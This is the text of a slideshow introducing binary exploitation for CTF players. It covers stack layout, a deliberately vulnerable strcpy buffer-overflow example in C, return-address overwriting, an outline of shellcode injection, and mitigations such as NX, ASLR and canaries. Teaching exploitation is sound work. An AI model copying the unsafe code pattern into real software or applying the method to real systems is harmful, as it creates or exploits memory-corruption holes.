Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Introduction to Binary Exploitation

690 views

Published on

Introduction to Binary Exploitation

Published in: Software
  • Be the first to comment

Introduction to Binary Exploitation

  1. 1. An Intro to Binary Exploitation Aswin M Guptha @aswinmguptha
  2. 2. $whoami ● BTech 2nd year Undergraduate ● Amrita University ● Regular CTF Player ● Team bi0s ● Focus on Binary Exploitation, Web Exploitation
  3. 3. Aim ● Give you a better understanding of mechanism of software exploitation ● Prepare you to identify the vulnerabilities in program source codes ● Help you understand HOW and WHY of exploit mitigation technologies ● We will cover a few key concepts deeply
  4. 4. Course Outline ● Basic Stack overflows ● Shell code injection ● Other vulnerability scenarios ● Recognizing vulnerability ● Exploit mitigation technologies
  5. 5. Why? ● Found by the late 90s ● Still relevent? ● 2016 scenario ● Your weakness, my strength
  6. 6. Lets get down to business
  7. 7. What is our Goal? ● Arbitrary code execution ● Example ● Forcing binary to give root access over the internet! ● Forcing a administrator privileged process to execute normally
  8. 8. First Attempt, But this worked in movies...
  9. 9. Real life ● We don’t know the password, and really hard to guess it too. ● There is a function which gives shell. ● What if we could change the flow of execution and execute that function ? means what???
  10. 10. Process Memory Organization Content of an assembly file ● Executable section: TEXT – The actual code that will be executed ● Initialized data: DATA – Global variables ● Uninitialized data: BSS ● Local variables
  11. 11. x86 Review ● Function call ● Returning after a function call ● Instruction pointer ● Stack
  12. 12. The Stack
  13. 13. The Stack
  14. 14. The Stack ….... 10. push j 11. push i 12. call add 13. add esp, 0x8 …… 20. add: 21. mov eax, [esp+0x4] 22. mov ebx, [esp+0x8] 23. add eax, ebx 24. ret Memory 0XDEADBEEF
  15. 15. Buffer Overflow
  16. 16. Buffer Overflow #include<stdio.h> int main(){ char buffer[16]; int var; } buffer var sfp ret Bottomofmemory Topofstack Bottomofstack Topofmemory 16 4 4 4
  17. 17. Buffer Overflow Lets do some challenges ● #1 overwrite ● #2 validate
  18. 18. Buffer Overflow void function(char *str){ char buffer[16]; strcpy(buffer, str); } int main(){ char large_string[256]; int i; for (i = 0; i < 255; i++){ large_string[i] = ‘A’; } function(large_string); }
  19. 19. Buffer Overflow AAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA AAAAAAAAAAAA Buffer sfp ret *str 416 4 4 ● The return address is overwritten with ‘AAAA’ (0x41414141) ● Thus the function exits and goes to execute the instruction at 0x41414141 ● This results in a SegFault. So what??? Bottomofmemory Topofstack Bottomofstack Topofmemory
  20. 20. Buffer Overflow ● We have seen how to crash our own program by overwriting the return address of a function. ● What if we could overwrite the return address with valid address ? Lets start walking from where we stopped!!!
  21. 21. Buffer Overflow ● Is anyone mad enough to put a function which give shell so easily ? ● So what is the use of this ? ● There come the shellcode injection
  22. 22. Shellcode
  23. 23. Shellcode ● List of crafted instructions ● Executed once the code is injected to a running application.
  24. 24. Shellcode Properties of a shell code? – Should be small enough to fit in the buffer – Shouldn’t contain any null charecters – Shouldn’t refer to data section
  25. 25. Shellcode Whats next? – Okay, we know what is a shell code, now what? ● Put a shell code into buffer ● Fill the rest of buffer with junk ● Overwrite saved eip to point to buffer
  26. 26. Shellcode Ready, Set, Go
  27. 27. The battle continues... ● RET2LIBC ● ROP ● Format String Vuln. ● Heap Vuln. And so...
  28. 28. Whats next? ● Google is your best friend! ● Smashing The Stack For Fun And Profit – By Aleph One ● And YES, CTFs!
  29. 29. In a nutshell ● Changing flow of execution – Buffer overflow ● Injecting your vuln code – Shellcode Injection ● Vuln detection and prevention Rest I leave to you, Good luck! Queries? Ping @aswinmguptha
  30. 30. Becoming Stronger! ● NX – Segments are either executable or writeable, but NOT both ● ASLR – Address Space Layout Randomization ● Canary, PIE – Stack protectors

×